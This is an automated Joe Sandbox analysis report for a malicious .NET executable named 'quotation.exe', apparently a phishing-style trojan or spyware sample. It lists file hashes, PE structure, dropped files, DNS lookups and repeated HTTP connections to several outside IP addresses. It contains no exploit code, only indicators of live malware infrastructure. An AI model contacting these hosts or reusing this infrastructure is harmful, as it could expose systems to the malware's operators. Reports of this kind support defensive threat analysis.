| 161.97.168.245 | www.nb-shenshi.buzz | United States | 51167 | CONTABODE | false |
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1567392
                                                                                Start date and time:2024-12-03 14:12:19 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 54s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:8
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:quotation.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/13
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 86%
                                                                                • Number of executed functions: 79
                                                                                • Number of non-executed functions: 282
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • VT rate limit hit for: quotation.exe
| Time | Type | Description |
|---|---|---|
| 08:13:09 | API Interceptor | 1x Sleep call for process: quotation.exe modified |
| 08:14:20 | API Interceptor | 9704643x Sleep call for process: SearchProtocolHost.exe modified |
                                                                                Process:C:\Users\user\Desktop\quotation.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
Preview:SQLite format 3
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.778398726761302
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:quotation.exe
                                                                                File size:814'592 bytes
                                                                                MD5:fb56fbfa78c904b961a8db42b7ac648d
                                                                                SHA1:a4400e1e8e97fec1a68290b24aea4250189610ef
                                                                                SHA256:c8135636799971efa2fe543c693f96ab2238d38b140d1da6a07727231161a765
                                                                                SHA512:417465566d93bdcd35edfc7819c0522f1294f3029b9bc00e9f0d82ec7c913208832bc2fd6f202bde9357e938a61260756592dd1315f75f39ae5f04faf54de7fe
                                                                                SSDEEP:24576:iNIeecHJa3Javd4xS6a7VrG8nAFsOEXZmyI:sBecHJKavX7ViEXZ7
                                                                                TLSH:A905F19C3605B54FC947C6318FA4ED74AA546DEEA70683039AD71EEFF82D856CE040E2
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P......N:... ...@....@.. ....................................@................................
                                                                                Icon Hash:033424c4c199d839
                                                                                Entrypoint:0x4c3a4e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674EA3B6 [Tue Dec 3 06:22:46 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc39f4 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x4ca8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x2000 | 0xc1a54 | 0xc1c00 | a724df225ce7ea33dafe72d6fdbedddc | False | 0.9089818548387096 | data | 7.780021412382436 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xc4000 | 0x4ca8 | 0x4e00 | d27bc007cf0673171da6599495e50d87 | False | 0.9410556891025641 | data | 7.768996075933271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xca000 | 0xc | 0x200 | 89a4346b0d30bc07d9f8a93c072a30cb | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0xc4130 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094 |
| RT_GROUP_ICON | 0xc882c | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xc8840 | 0x278 | data | | | 0.47151898734177217 |
| RT_MANIFEST | 0xc8ab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
| --- | --- |
| mscoree.dll | _CorExeMain |
                                                                                Dec 3, 2024 14:14:24.690140963 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423707008 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423784971 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:26.423985958 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:26.426657915 CET4981780192.168.2.5156.232.181.155
                                                                                Dec 3, 2024 14:14:26.546777010 CET8049817156.232.181.155192.168.2.5
                                                                                Dec 3, 2024 14:14:32.106647015 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.226711035 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:32.226913929 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.242265940 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:32.363322973 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522542953 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522656918 CET8049837185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:33.522701979 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:33.758436918 CET4983780192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.777415037 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.898210049 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:34.898333073 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:34.913707018 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:35.033802032 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197098017 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197501898 CET8049843185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:36.197554111 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:36.430354118 CET4984380192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.479754925 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.599899054 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:37.600012064 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.686753988 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:37.807320118 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:37.807362080 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897469997 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897620916 CET8049850185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:38.897748947 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:39.195950031 CET4985080192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.393861055 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.514297962 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:40.514389992 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.593611956 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:40.713664055 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763470888 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763505936 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:41.763700962 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:41.766402006 CET4985680192.168.2.5185.27.134.206
                                                                                Dec 3, 2024 14:14:41.886346102 CET8049856185.27.134.206192.168.2.5
                                                                                Dec 3, 2024 14:14:47.688508987 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.811429024 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:47.811614037 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.828804970 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:47.951334953 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.147865057 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.147953033 CET804987488.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:49.148040056 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:49.336564064 CET4987480192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.355546951 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.475903034 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:50.476063967 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.492878914 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:50.614188910 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843071938 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843144894 CET804987988.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:51.843228102 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:52.008362055 CET4987980192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.027252913 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.147711992 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:53.147804022 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.165179968 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:53.285541058 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:53.285696983 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482547998 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482676983 CET804988588.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:54.482737064 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:54.680218935 CET4988580192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.701231003 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.821300983 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:55.821382046 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.835191965 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:55.956743002 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142148972 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142185926 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:14:57.142388105 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:57.205339909 CET4989080192.168.2.588.99.61.52
                                                                                Dec 3, 2024 14:14:57.325396061 CET804989088.99.61.52192.168.2.5
                                                                                Dec 3, 2024 14:15:02.528754950 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.648844004 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:02.649574995 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.664835930 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:02.785263062 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.796664000 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.797269106 CET8049903104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:03.797324896 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:04.180243015 CET4990380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.199481010 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.319540977 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:05.320614100 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.335757017 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:05.455679893 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530419111 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530447960 CET8049910104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:06.530519962 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:06.852092981 CET4991080192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:07.871535063 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:07.991631985 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:07.991709948 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:08.013103008 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:08.133143902 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:08.133166075 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258505106 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258704901 CET8049916104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:09.258878946 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:09.526415110 CET4991680192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.543272972 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.663345098 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:10.666045904 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.676479101 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:10.796540976 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930099010 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930711985 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:11.930768013 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:11.933549881 CET4992380192.168.2.5104.21.90.137
                                                                                Dec 3, 2024 14:15:12.053675890 CET8049923104.21.90.137192.168.2.5
                                                                                Dec 3, 2024 14:15:17.409109116 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.529098988 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:17.529269934 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.545638084 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:17.665659904 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822029114 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822173119 CET8049939209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:18.822371006 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:19.055241108 CET4993980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.074666977 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.195322037 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:20.195430040 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.214359045 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:20.334582090 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.465904951 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.465985060 CET8049945209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:21.466553926 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:21.727098942 CET4994580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.745879889 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.865952969 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:22.870563030 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:22.890433073 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.148901939 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.523921013 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.843988895 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.844006062 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.844048977 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:23.893120050 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.943262100 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:23.965044022 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.398943901 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:24.564693928 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.662591934 CET8049952209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:24.666488886 CET4995280192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.418432951 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.538805962 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:25.538899899 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.548809052 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:25.669879913 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767414093 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767488003 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:26.767941952 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:26.770581961 CET4995880192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:15:26.890538931 CET8049958209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:15:32.185986996 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.306129932 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:32.306224108 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.334563971 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:32.456425905 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635622978 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635780096 CET8049974176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:33.635829926 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:33.836443901 CET4997480192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.855205059 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.975192070 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:34.975331068 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:34.991055012 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:35.110971928 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:36.346638918 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:36.346694946 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:36.346790075 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:36.492917061 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.511464119 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.631437063 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:37.631527901 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.649564028 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.769664049 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:37.769701958 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006740093 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006850004 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006953955 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:39.164644957 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:17:12.020535946 CET8050028154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:12.020627022 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:12.917409897 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.038002968 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:13.040757895 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.049207926 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.169527054 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246164083 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246247053 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246315002 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:16.248871088 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:16.369482040 CET8050029154.70.82.246192.168.2.5
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:13:57.238244057 CET6372553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:13:58.059077024 CET53637251.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:14.871596098 CET6229753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:15.883691072 CET6229753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:16.443689108 CET53622971.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:17.073652983 CET53622971.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:31.433783054 CET6466053192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:32.103765011 CET53646601.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:46.782810926 CET5126653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:47.685944080 CET53512661.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:02.247411966 CET5082953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:02.525659084 CET53508291.1.1.1192.168.2.5
